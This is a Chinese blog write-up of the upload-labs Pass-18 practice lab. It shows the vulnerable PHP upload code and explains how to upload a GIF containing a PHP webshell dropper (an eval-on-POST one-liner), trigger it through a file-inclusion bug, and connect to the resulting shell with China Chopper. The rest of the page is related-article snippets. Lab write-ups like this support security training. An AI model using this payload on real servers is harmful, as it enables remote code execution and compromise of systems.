uplload 通关纪实 pass18

最新推荐文章于 2022-04-12 21:23:50 发布
最新推荐文章于 2022-04-12 21:23:50 发布
阅读量138 收藏
点赞数
分类专栏: upload 通关纪实
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56378124/article/details/118387190
版权

源代码如下:

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}

将<?php fputs(fopen('2.php','w'),'<?php @eval($_POST["pass"]);?>’);?>插入到gif图片中(文件名为18.gif),如下图所示:
在这里插入图片描述
然后上传18.gif图片,并且同时用burpsuite抓包:
在这里插入图片描述
把抓到的包发送到repeater模块,并且点击Go,可以看到成功上传,并且返回了回显的gif图片,如下图所示:
在这里插入图片描述
然后利用文件包含漏洞构造如下网址,成功访问到,与此同时,在include.php同一目录下就会生成一个2.php:
在这里插入图片描述
访问网页同时生成的2.php文件:
在这里插入图片描述
然后使用菜刀连接这个2.php,密码为我们之前写入的一句话木马里的pass:
在这里插入图片描述
成功访问到:
在这里插入图片描述

安全界 的彭于晏
关注
专栏目录
WebGoat通关详解.zip
03-22
"WebGoat通关详解.zip"这个压缩包文件很可能包含了一步步指导用户如何完成WebGoat所有挑战的详细教程。 在描述中提到的"webgoat通关"意味着这个资源将带领用户了解如何解决WebGoat中的各种安全问题,从基础到高级,...
Upload-labs-master实验笔记:Pass18(条件竞争)
大大大蜜蜂的博客
03-28 1332
Upload-labs-master实验笔记:Pass18 以部分源码为例: 可以看到,该源码功能大概是,当我们上传一个文件后,文件会先上传到服务器,然后再判断该文件类型是否含在白名单中(jpg、png、gif),如果是,则会将该文件重命名后放在服务器中,如果不是,则会将该文件删除掉。那么我们可以知道,文件是先被上传到了服务器,而后才做判断之类的一系列操作,这样就存在条件竞争漏洞。 1.首先我们的思路是:可以使用burpsuit抓包软件中的Intruder模块,创建两个自动攻击方案,第一个自动攻击方案是
upload_labs_pass18_条件竞争
qq_51550750的博客
04-12 3902
pass18 第18关和前面14-17关(要求上传图片马)不同,直接要求上传一个webshell 提示: 源码: $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['name']; $temp_file = $_FILES['upload_file']['tmp
Upload-labs Pass-17 Pass-18 条件竞争
baynk的博客
11-05 2971
Pass-17 条件竞争1 看下源码,感觉啥漏洞都没,只能查看writeup的提示了,答案是条件竞争。 $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['nam...
寒假buu刷题记录 序列化与反序列化、XSS注入、UPLOAD-LABS文件上传
qq_62984336的博客
03-02 2666
做题总结 这个假期看了很多师傅的wp,有一些贴在总结里了,希望对大家也有帮助。(如有冒犯请联系我删除) 序列化与反序列化总结 pop链构造POP链的构造_一个打渔的的博客K6uQ5H7^ff(R-CSDN博客_pop链 序列化与反序列化序列化和反序列化的详解_tree_ifconfig的博客-CSDN博客_序列化和反序列化 简述序列化与反序列化 - 寒江独钓人 - 博客园 unserialize() 对单一的已序列化的变量进行操作,将其转换回 PHP 的值。返回的是转换之后的值,可为 inte
upload-labs】————19、Pass-18
Fly_鹏程万里
08-15 715
查看源代码: //index.php $is_upload = false; $msg = null; if (isset($_POST['submit'])) { require_once("./myupload.php"); $imgFileName =time(); $u = new MyUpload($_FILES['upload_file']['name'...
愤怒的小鸟水煮蛋1-18关通关录像.mp4
05-16
愤怒的小鸟水煮蛋1-18关通关录像
00054管理学原理-通关宝典
02-06
管理学原理是研究组织管理活动及其规律的学科,它涵盖了管理的本质、职能、管理者等多个方面。在准备00054管理学原理的考试时,考生需要熟悉各种题型,如单项选择题、多项选择题、判断说明题、简答题、论述题以及...
upload-labs】条件竞争pass-17~pass-18
qq_43665434的博客
03-23 2171
upload-labs】条件竞争pass-17~pass-18 条件竞争 ​ 一些网站上传文件的逻辑是先允许上传任意文件,然后检测上传文件的文件包是否合法(校验文件后缀、内容等),如果不合法则删除文件。这里存在的问题是文件上传成功后和删除文件之间存在一个短的时间差(因为要执行检查文件和删除文件的操作),攻击者就可以利用这个时间差完成竞争条件的上传漏洞攻击。 【pass-17】 1、源码分析 $is_upload = false; $msg = null; if(isset($_POST
2025年软考高级 - 信息系统项目管理师考试备考全攻略
11-09
2025年软考高级 - 信息系统项目管理师考试备考全攻略
MySQL 5.7从入门到精通 第23章 新闻发布系统数据库设计 共6页.pptx
最新发布
11-09
【课程大纲】 第1章 初始MySQL 共19页.pptx 第2章 MySQL的安装与配置 共14页.pptx 第3章 数据库的基本操作 共11页.pptx 第4章 数据表的基本操作 共26页.pptx 第5章 数据类型和运算符 共17页.pptx 第6章 MySQL函数 共76页.pptx 第7章 查询数据 共48页.pptx 第8章 插入、更新与删除数据 共10页.pptx 第9章 索引 共11页.pptx 第10章 存储过程和函数 共19页.pptx 第11章 视图 共20页.pptx 第12章 触发器 共11页.pptx 第13章 用户管理 共25页.pptx 第14章 数据备份与还原 共21页.pptx 第15章 MySQL日志 共22页.pptx 第16章 性能优化 共18页.pptx 第17章 MySQL Workbench5.2 的使用 共15页.pptx 第18章 MySQL Replication 共27页.pptx 第19章 MySQL Cluster 共49页.pptx 第20章 MySQL管理利器——MySQL Utilities 共5页.pptx 第21章 读写分离的利器——MySQL Proxy 共5页.pptx 第22章 PHP操作MySQL数据库 共7页.pptx 第23章 新闻发布系统数据库设计 共6页.pptx 第24章 论坛管理系统数据库设计 共6页.pptx
高分springboot毕设+vue的游戏创意工坊与推广平台的设计与实现_orv论文-Java源码.zip
11-09
本项目是一个基于Spring Boot和Vue的游戏创意工坊与推广平台的设计与实现。该项目旨在为游戏开发者和玩家提供一个集中的平台,使他们能够分享创意、展示作品并获取反馈。平台的核心功能包括游戏创意的提交与管理、游戏作品的展示与评价、用户间的互动交流以及推广活动的组织与管理。 在技术实现上,后端采用Spring Boot框架,利用其快速开发和部署的特点,确保系统的稳定性和高效性。前端则使用Vue.js,以其灵活的数据绑定和组件化开发方式,为用户提供流畅的交互体验。数据库设计充分考虑了数据的安全性和扩展性,以支持大量用户和作品的存储需求。 此外,项目还集成了多种实用工具和插件,如用户认证、权限管理、文件存储等,以提升平台的整体功能和用户体验。通过这个项目,用户不仅能够锻炼自己的编程技能,还能深入了解游戏开发和运营的全过程。
考研助手--论文.zip
11-09
基于SSM的毕业设计源码
C# AutoCAD DWG打印成PDF 代码
11-09
自己写的转PDF代码,调试,可用。
PowerQuery的使用与M语言介绍.docx
11-09
PowerQuery的使用与M语言介绍.docx
【java毕业设计】小说阅读平台的设计(springboot+vue+mysql+说明文档).zip
11-09
项目经过测试均可完美运行! 环境说明: 开发语言:java jdk:jdk1.8 数据库:mysql 5.7+ 数据库工具:Navicat11+ 管理工具:maven 开发工具:idea/eclipse
高分springboot毕设+vue的实验室开放管理系统-Java源码.zip
11-09
本项目是一个基于Spring Boot和Vue的实验室开放管理系统,旨在为计算机相关专业的大学生提供一个实践平台,同时也适合Java学习者进行项目实战练习。系统集成了用户管理、实验室预约、设备管理、实验课程安排等多项功能,通过现代化的前后端分离架构,实现了高效、便捷的实验室资源管理。 在用户管理方面,系统支持多种角色的创建与管理,包括管理员、教师和学生,每种角色都有其特定的权限和功能。实验室预约功能允许学生根据实验室的空闲时间和设备的可用性进行预约,有效避免了资源冲突。设备管理模块则详细记录了实验室中各种设备的状态和维护历史,方便管理人员进行设备的调度和维护。 此外,系统还提供了实验课程安排的功能,教师可以在线发布实验课程信息,学生可以查看课程安排并进行报名。整个系统的设计注重用户体验和操作便捷性,前端采用Vue框架,提供了直观的用户界面,后端则利用Spring Boot实现了强大的业务逻辑处理能力。
22个财务报告PPT模板
11-09
22个财务报告PPT模板
ISO 24342 2024.pdf
11-09
ISO 24342 2024.pdf
upload-labs靶场通关pass04
09-14
要通过upload-labs靶场的pass04,您需要进行以下步骤: 1. 首先,上传一个符合格式的PHP脚本文件,并将其扩展名改为图片格式。根据引用中的描述,您需要将.htaccess文件上传到服务器。.htaccess文件是Apache服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值